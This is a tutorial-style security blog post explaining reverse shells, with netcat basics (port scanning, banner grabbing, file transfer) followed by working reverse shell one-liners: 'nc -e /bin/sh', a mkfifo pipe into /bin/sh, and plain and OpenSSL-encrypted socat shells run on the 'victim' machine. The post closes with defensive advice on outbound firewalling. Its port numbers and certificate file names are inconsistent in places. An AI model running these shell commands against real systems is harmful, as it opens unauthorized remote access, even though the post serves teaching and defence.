In this post, we will investigate the concept of a reverse shell and examine some examples of its application in practice by making use of netcat and socat.
It is important to continue further with more advanced post-exploitation phases as soon as we are able to remotely execute code by, for example, utilizing a known RCE-vulnerability. Once we are able to do this, we can move on.
What is reverse shell?
A malicious piece of software known as a reverse shell gives cybercriminals the ability to break into a remote computer system by establishing a connection to that system from another server.
It is typically used in targeted attacks, in which an attacker can use the reverse shell to gain access to a network or system without the knowledge or permission of the system's owner. This type of attack is known as a backdoor exploit.
The process of establishing a reverse shell begins with the attacker locating a system that is susceptible to attack, followed by the transmission of a malicious payload to the compromised system.
This payload can be in the form of a malicious program that is designed to open a backdoor on the system. This gives the attacker the ability to access the system remotely.
After the program has been installed, the attacker can then use the reverse shell to gain access to the system. Once inside, they will have the ability to run commands, view files, and even make changes to the system itself.
Because they are frequently disguised to look like legitimate traffic, reverse shells can be difficult to spot when they are being used in an attack. In addition to this, they frequently avoid being caught by security measures including firewalls and intrusion detection systems.
As a result of this, businesses need to maintain their vigilance and take the necessary precautions to ensure the safety of their computer systems. This includes keeping a close eye on the traffic on the network, making sure your antivirus software is up to date, and using robust passwords.
What about cats?
The reverse shell will be different depending on the operating system that is installed on the victim's workstation as well as the services that are running on that workstation. For example, it could be php, python, jsp, powershell, or aspx.
netCAT
A computer networking utility known as netcat, it can read from and write to network connections made using either TCP or UDP protocols.
It is a command-line tool that can be used for a variety of tasks, including port scanning, port listening, file transfer, and port redirection, among others. This tool serves as a general purpose command-line utility.
A wide variety of activities, such as testing the safety of a network, debugging a network, scanning ports, and transferring data, are all possible with the help of Netcat. It is also possible to use it to create a fundamental backdoor on a system, which will enable an adversary to gain remote access to the system.
As a result of its extensive functionality and adaptability, Netcat is frequently referred to as the "Swiss Army Knife" of network tools.
It is possible to put network services like web servers, database servers, and email servers through their paces with this tool. It is also possible to test network connections, check the rules of a firewall, and transfer files using this tool.
practical examples
Checking for an open TCP port 22:
nc -vn 192.168.56.103 22
Checking for an open TCP port 80:
nc -vn 192.168.56.103 80
TCP port scan:
nc -zvn 192.168.56.103 21 22 8180
-z - instructs netcat to scan without establishing a connection. -v - verbosity to see the result, -n - skip DNS lookup.
You can also scan port ranges as shown in the example below:
nc -zv scanme.nmap.org 21-25
or
nc -zvn 45.33.32.156 21-100
In order to scan UDP ports with nmap, you will need to have root privileges. In the event that they are not present, the utility known as netcat may also be of assistance to us:
nc -zvu scanme.nmap.org 53 111
Banner grabbing is a method for collecting information from targets in the form of banners that are displayed by a variety of applications when we connect to those targets. This technique can expose information about the target’s software. The following illustration provides a demonstration of how to collect banners using Netcat:
nc -v scanme.nmap.org 80
nc -v 192.168.56.103 21
It is possible for Netcat to function as a basic web server, displaying HTML pages:
while true; do nc -lp 8888 < index.html; done
It is also possible to set up a straightforward chat service between two machines utilizing Netcat in both the client and server roles.
machine A (192.168.56.1):
nc -lp 4448
machine B (192.168.56.103):
nc 192.168.56.1 4448
After running the commands, you will notice that any characters entered into the terminal window of one machine will appear in the terminal window of the other machine. This is the case regardless of which machine was used to enter the characters.
Text files and binary files, as well as other file types, can be transmitted from one computer to another using the Netcat program.
To transfer a file from our Kali virtual machine to a Debian-based system, we establish a configuration that is very similar to the one used in the earlier chat example; however, there are a few key differences.
On a Debian operating system, we will configure a Netcat listener to listen on port 4445, and we will direct the output to a file named websec.txt:
nc -nlvp 4444 > websec.txt
On the kali system, we will transfer the websec.txt file to the debian machine on TCP port 4444:
nc -nv 192.168.228.176 4444 < websec.txt
Netcat reverse shell
First of all, for the sake of simplicity, the victim in this example allows outgoing connections on any port (default iptables firewall rule) (default iptables firewall rule).
The listener port number in our instance is 4445. You are able to change it to the port of your choice. A listener can be any program or utility that is capable of opening TCP/UDP connections or sockets. Listeners are used to monitor network traffic.
The nc utility is the one that we favor using the vast majority of the time.
nc -nlvp 4445
Again for simplicity, in our examples target is a linux machine (Debian-based renmux machine). Run on a victim machine:
nc -e /bin/sh 192.168.56.1 4444
Newer linux machine by default has traditional netcat with GAPING_SECURITY_HOLE disabled, it means you don’t have the -e option of netcat. Just run:
mkfifo /tmp/p; nc <LHOST> <LPORT> 0</tmp/p | /bin/sh > /tmp/p 2>&1; rm /tmp/p
So, in our case, at the victim machine:
mkfifo /tmp/p; nc 192.168.228.221 4445 0</tmp/p | /bin/sh > /tmp/p 2>&1; rm /tmp/p
Netcat was built to help in network analysis. It was designed by a man we only know about by his nickname, The Hobbit. Without any financial reward, he gave this tool to the IT community, for which he received the well-deserved respect and recognition of the community.
soCAT
Socat is a command line tool that allows users to establish connections between two endpoints. It can be used to create secure tunnels, transfer files, and enable communication between different systems and networks. It can also be used to create virtual private networks (VPNs) and create secure connections between hosts.
Socat is a versatile tool that can be used for a variety of tasks. For example, it can be used to forward network traffic between two systems, create secure tunnels for remote access, and establish encrypted connections between systems. Additionally, it can be used to set up virtual private networks (VPNs), which can be used to access restricted networks or to securely connect two or more devices over the internet.
The versatility of Socat makes it a great choice for users looking to create secure connections between two hosts. It is easy to set up and use, and it can be used for a variety of tasks. Whether you're looking to create secure connections for remote access, create virtual private networks, or transfer files between two systems, Socat is a great choice.
socat reverse shell
On attacker's machine (kali) run:
socat -d -d TCP4:4445 STDOUT
The user now navigates to the victim's Ubuntu machine to start a reverse connection to connect to his listener on the Kali machine. You need the type of address, IP and port with the type of connection to be established. Reverse Bash Shell obtained:
socat TCP4:192.168.228.221:4444 EXEC:/bin/bash
socat encrypted reverse shell
To encrypt traffic with OpenSSL, you first need to create a key and an associated certificate. In this example, the user creates a key called websec.key and a certificate called websec.crt:
openssl req -newkey rsa:2048 -nodes -keyout websec.key -x509 -days 1000 -subj '/CN=www.websec.nl/O=Websec.B.V./C=NL' -out websec.crt
Then, just run on attacker's machine:
socat -d -d OPENSSL-LISTEN:4445,cert=websec.pem,verify=0,fork STDOUT
On the victim's Ubuntu machine, create a reverse shell for the listener that was added on the kali machine. The user will use the same address type, i.e. OPENSSL:
socat OPENSSL:192.168.228.221:4445,verify=0 EXEC:/bin/bash
Conclusion
There is still one more caveat. In actual cyber attacks, the capability to use a reverse shell can also be obtained through social engineering. For instance, a piece of malware that is installed on a local workstation through a phishing email or a malicious website might initiate an outgoing connection to a command server and provide hackers with a reverse shell capability.
In spite of the fact that attackers make use of reverse shells in order to gain unauthorized access to systems, system administrators are also able to make use of these shells in order to gain secure remote access to a system. This can be helpful in circumstances in which direct access to the system itself, such as when it is housed in a remote location, is not feasible.
In general, reverse shells have the potential to be an effective tool for both administrators and attackers. However, organizations ought to take precautions to guarantee the safety of their computer systems and ensure that any reverse shells they employ are protected in the appropriate manner.
Unfortunately, reverse shells cannot be totally prevented. Unless you intentionally use reverse shells for remote administration, all reverse shell connections are presumably hostile.
Control all outbound connections from the server using the built-in firewall; only allow access to the required IP addresses and ports; block all others - this is the most fundamental and time-tested technique. This might be accomplished by sandboxing the server or running it in a basic container.
Information for educational purposes only. Please follow the law and do not use this information for illegal purposes.
References
https://nmap.org/ncat/guide/index.html
https://sectools.org/tool/socat/